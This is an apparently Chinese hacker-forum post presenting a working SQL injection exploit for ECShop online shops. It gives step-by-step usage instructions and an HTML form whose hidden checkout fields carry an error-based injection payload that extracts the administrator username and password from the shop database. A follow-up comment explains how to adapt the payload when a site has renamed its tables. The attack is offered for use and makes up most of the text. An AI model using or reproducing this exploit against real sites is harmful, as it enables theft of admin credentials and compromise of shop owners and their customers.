ecshop 注入漏洞 利用方法&EXP
注入:购物车中一定需要有物品!!!
登陆目标网站,注册,选任意一件商品加入到购物车,然后结算,将下面的代码保存为html就可以注入了
- <form name="form1" method="post">
- ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
- <textarea rows="5" style="font-family:Times New Roman;font-size:14pt;" cols="80" name="province">11'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#</textarea>
- <input name="district" type="text" style="display:none" value="1294"/>
- <input name="consignee" type="text" style="display:none" value="1111111"/>
- <input name="email" type="text" style="display:none" value="silic@blackbap.com"/>
- <input name="address" type="text" style="display:none" value="111111"/>
- <input name="tel" type="text" style="display:none" value="1111111"/>
- <input name="step" type="text" style="display:none" value="consignee"/>
- <input name="act" type="text" style="display:none" value="checkout"/><br /><br />
- 地址:<input name="theAction" type="text" id="theAction" value="http://xxx.com/flow.php?step=consignee" size="50"><br /><br />
- <input type="submit" value="配送至这个地址" onClick="this.form.action=this.form.theAction.value;" name="Submit"><br/><br />
- //11
- </form>
效果如下:
ropin :
补充一下,如果使用不成功,注意看报错语句:MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT region_id, region_name FROM `asky880`.`jf_region` WHERE r。看到了没, 这个网站更改了数据库的默认名字,在exp里面也要相应的修改,把ecs_admin_user改为jf_admin_user
